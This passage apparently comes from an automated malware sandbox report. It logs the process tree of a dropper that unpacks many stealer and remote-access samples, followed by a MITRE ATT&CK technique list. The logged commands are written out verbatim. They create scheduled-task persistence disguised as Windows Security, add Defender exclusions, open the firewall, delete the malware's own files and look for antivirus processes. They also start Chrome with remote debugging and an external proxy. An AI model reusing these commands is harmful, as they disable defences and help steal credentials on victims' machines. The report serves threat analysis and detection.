      Command and Scripting Interpreter: PowerShell
      PID:5688
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    PID:4476
- C:\Users\Admin\AppData\Local\Temp\Files\Files\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\Client-built.exe"
  2⤵
  PID:6736
- - C:\Windows\system32\schtasks.exe
    "schtasks" /create /tn "server chek" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\system.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5868
- - C:\Users\Admin\AppData\Roaming\SubDir\system.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\system.exe"
    3⤵
    PID:7004
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "server chek" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\system.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1632
- C:\Users\Admin\AppData\Local\Temp\Files\Files\Server1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\Server1.exe"
  2⤵
  PID:6796
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Files\Server1.exe" "Server1.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:9928
- C:\Users\Admin\AppData\Local\Temp\Files\Files\DCRatBuild.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\DCRatBuild.exe"
  2⤵
  PID:6304
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Hyperruntimeperf\1BsDc3sv0Ug0mZu.vbe"
    3⤵
    PID:5388
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Hyperruntimeperf\vPQVVqEr.bat" "
      4⤵
      PID:8248
    - - C:\Hyperruntimeperf\agentServerFont.exe
        
        "C:\Hyperruntimeperf\agentServerFont.exe"
        5⤵
        
        PID:9788
- C:\Users\Admin\AppData\Local\Temp\Files\Files\MePaxil.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\MePaxil.exe"
  2⤵
  PID:6328
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Offensive Offensive.cmd & Offensive.cmd & exit
    3⤵
    PID:3144
- C:\Users\Admin\AppData\Local\Temp\Files\Files\SrbijaSetupHokej.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\SrbijaSetupHokej.exe"
  2⤵
  PID:7704
- - C:\Users\Admin\AppData\Local\Temp\is-VU7IC.tmp\SrbijaSetupHokej.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-VU7IC.tmp\SrbijaSetupHokej.tmp" /SL5="$7037A,3939740,937984,C:\Users\Admin\AppData\Local\Temp\Files\Files\SrbijaSetupHokej.exe"
    3⤵
    PID:7248
- C:\Users\Admin\AppData\Local\Temp\Files\Files\build.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\build.exe"
  2⤵
  PID:5808
- C:\Users\Admin\AppData\Local\Temp\Files\Files\kill.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\kill.exe"
  2⤵
  PID:7040
- - C:\Windows\SysWOW64\explorer.exe
    explorer.exe
    3⤵
    PID:7880
- C:\Users\Admin\AppData\Local\Temp\Files\Files\Identification.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Files\Identification.exe"
  2⤵
  PID:6432

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3628
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3716

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
1⤵
PID:3780

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
PID:3812
- C:\Users\Admin\AppData\Local\Temp\Files\Sniffthem.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Sniffthem.exe"
  2⤵
  PID:4036
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    PID:4052
- - C:\Windows\system32\msiexec.exe
    "C:\Windows\system32\msiexec.exe"
    3⤵
    PID:3312
- - C:\Windows\system32\audiodg.exe
    "C:\Windows\system32\audiodg.exe"
    3⤵
    PID:2120
- C:\Users\Admin\AppData\Local\Temp\Files\malware.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\malware.exe"
  2⤵
  PID:3552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command Expand-Archive "tor-win32-0.3.4.9.zip" " TorFiles"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1236
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /K TorFiles\tor\tor.exe --nt-service --HTTPTunnelPort 8118
    3⤵
    PID:3164
- C:\Users\Admin\AppData\Local\Temp\Files\taskhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\taskhost.exe"
  2⤵
  PID:3520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\taskhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5420
- C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe"
  2⤵
  PID:3780
- C:\Users\Admin\AppData\Local\Temp\Files\LgendPremium.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\LgendPremium.exe"
  2⤵
  PID:3148
- C:\Users\Admin\AppData\Local\Temp\Files\chisel.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\chisel.exe"
  2⤵
  PID:4324
- C:\Users\Admin\AppData\Local\Temp\Files\builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"
  2⤵
  PID:4380
- C:\Users\Admin\AppData\Local\Temp\Files\s.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
  2⤵
  PID:5440
- C:\Users\Admin\AppData\Local\Temp\Files\5KNCHALAH.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\5KNCHALAH.exe"
  2⤵
  PID:5612
- C:\Users\Admin\AppData\Local\Temp\Files\random.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
  2⤵
  PID:4284
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:5764
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4519758,0x7fef4519768,0x7fef4519778
      4⤵
      PID:5152
- C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
  2⤵
  PID:1652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Steam.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Steam.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:8672
- C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
  2⤵
  PID:1352
- - C:\Users\Admin\AppData\Local\Temp\2214614909.exe
    C:\Users\Admin\AppData\Local\Temp\2214614909.exe
    3⤵
    PID:4632
- C:\Users\Admin\AppData\Local\Temp\Files\ZharkBOT.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ZharkBOT.exe"
  2⤵
  PID:6356
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 168
    3⤵
    - Program crash
    PID:1920
- C:\Users\Admin\AppData\Local\Temp\Files\1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\1.exe"
  2⤵
  PID:5176
- C:\Users\Admin\AppData\Local\Temp\Files\Final.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Final.exe"
  2⤵
  PID:6836
- - C:\Users\Admin\AppData\Local\Temp\build.exe
    "C:\Users\Admin\AppData\Local\Temp\build.exe"
    3⤵
    PID:6512
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe"
      4⤵
      PID:6248
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:5380
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 3
        5⤵
        Delays execution with timeout.exe
        
        PID:6360
- C:\Users\Admin\AppData\Local\Temp\Files\Documents.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Documents.exe"
  2⤵
  PID:7032
- C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
  2⤵
  PID:4620
- - C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
    3⤵
    PID:4036
- C:\Users\Admin\AppData\Local\Temp\Files\logon.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\logon.exe"
  2⤵
  PID:6056
- C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe"
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:7412
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:3948
- C:\Users\Admin\AppData\Local\Temp\Files\blackload.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\blackload.exe"
  2⤵
  PID:4376
- C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"
  2⤵
  PID:7292
- C:\Users\Admin\AppData\Local\Temp\Files\ohtie89k.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ohtie89k.exe"
  2⤵
  PID:8396
- - C:\ProgramData\windows.exe
    "C:\ProgramData\windows.exe"
    3⤵
    PID:4024
- - C:\ProgramData\service.exe
    "C:\ProgramData\service.exe"
    3⤵
    PID:1824
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "service" /tr "C:\Users\Admin\AppData\Roaming\service.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7812
- C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe"
  2⤵
  PID:8964
- C:\Users\Admin\AppData\Local\Temp\Files\Excel-http.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Excel-http.exe"
  2⤵
  PID:9132
- C:\Users\Admin\AppData\Local\Temp\Files\test.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
  2⤵
  PID:8024
- C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe"
  2⤵
  PID:2704
- C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
  2⤵
  PID:9308

C:\Windows\system32\taskeng.exe
taskeng.exe {BF91A007-A8B8-4D11-A213-920004CBC1CD} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
1⤵
PID:3872
- C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
  "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
  2⤵
  PID:2976
- C:\ProgramData\lmpwxe\hmscmt.exe
  C:\ProgramData\lmpwxe\hmscmt.exe
  2⤵
  PID:9204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:1652
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3848

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:3132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3632
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3544

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
PID:3680
- C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe"
  2⤵
  PID:6456
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit
    3⤵
    PID:5908
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5400
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:4840
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5320
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:6060
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 229536
      4⤵
      PID:7008
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "ReprintVerificationMercyRepository" Elliott
      4⤵
      PID:4940
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Exhibit + Rand + Hours 229536\U
      4⤵
      PID:2960
  - - C:\Users\Admin\AppData\Local\Temp\229536\Webster.pif
      229536\Webster.pif 229536\U
      4⤵
      PID:2852
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:7424
- C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
  2⤵
  PID:4600
- - C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
    3⤵
    PID:7932
- C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"
  2⤵
  PID:8424

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
1⤵
PID:3084

C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
1⤵
PID:4072

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
PID:5016

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
PID:5936
- C:\Windows\system32\SearchUserHost.exe
  C:\Windows\system32\SearchUserHost.exe
  2⤵
  PID:6524
- - C:\Windows\system32\cmd.exe
    /c systeminfo
    3⤵
    PID:5332
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5956
- - C:\Windows\system32\cmd.exe
    /c "tasklist /v"
    3⤵
    PID:8740
  - - C:\Windows\system32\tasklist.exe
      tasklist /v
      4⤵
      Enumerates processes with tasklist
      PID:7436
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  PID:4108
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 548 552 560 65536 556
  2⤵
  PID:896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --proxy-server="217.65.2.14:3333"
1⤵
PID:4936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4519758,0x7fef4519768,0x7fef4519778
  2⤵
  PID:6032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1212 --field-trial-handle=1304,i,17138932488042191996,3517851122300481253,131072 /prefetch:2
  2⤵
  PID:6344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --proxy-server=217.65.2.14:3333 --mojo-platform-channel-handle=1452 --field-trial-handle=1304,i,17138932488042191996,3517851122300481253,131072 /prefetch:8
  2⤵
  PID:5272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --proxy-server=217.65.2.14:3333 --mojo-platform-channel-handle=1544 --field-trial-handle=1304,i,17138932488042191996,3517851122300481253,131072 /prefetch:8
  2⤵
  PID:5804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2084 --field-trial-handle=1304,i,17138932488042191996,3517851122300481253,131072 /prefetch:1
  2⤵
  PID:5980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2092 --field-trial-handle=1304,i,17138932488042191996,3517851122300481253,131072 /prefetch:1
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2592 --field-trial-handle=1304,i,17138932488042191996,3517851122300481253,131072 /prefetch:2
  2⤵
  PID:5428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3120 --field-trial-handle=1304,i,17138932488042191996,3517851122300481253,131072 /prefetch:1
  2⤵
  PID:3144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3148 --field-trial-handle=1304,i,17138932488042191996,3517851122300481253,131072 /prefetch:1
  2⤵
  PID:3020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --proxy-server="217.65.2.14:3333"
1⤵
PID:5056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4519758,0x7fef4519768,0x7fef4519778
  2⤵
  PID:532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1444,i,17847354165293120285,3271400673997921871,131072 /prefetch:2
  2⤵
  PID:3864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --proxy-server=217.65.2.14:3333 --mojo-platform-channel-handle=1344 --field-trial-handle=1444,i,17847354165293120285,3271400673997921871,131072 /prefetch:8
  2⤵
  PID:2224

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2812
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:4236

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

